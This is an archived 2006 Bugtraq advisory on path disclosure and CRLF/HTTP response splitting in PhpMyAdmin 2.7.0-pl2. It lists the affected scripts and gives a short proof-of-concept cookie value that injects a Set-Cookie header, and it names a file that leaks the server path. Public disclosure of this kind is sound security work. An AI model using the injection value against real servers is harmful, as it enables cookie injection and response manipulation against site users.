[<prev] [next>] [day] [month] [year] [list]
Date: 3 Dec 2006 19:26:23 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http
Response Splitting
*************************************************************************************
# Title : PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting Vulnerability
# Author : ajann
# Contact : :(
# Tested : Just 2.7.0-pl2
*************************************************************************************
[[CRLF]]]------------------------------------------------------
Files----
/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..
/Files----
Cookie:
->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;
phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue
New Cookie => some=value
.....
..
[[/CRLF]]]
[[PATH]]]------------------------------------------------------
File----
//libraries/common.lib.php
/File----
[[/PATH]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
Powered by blists - more mailing lists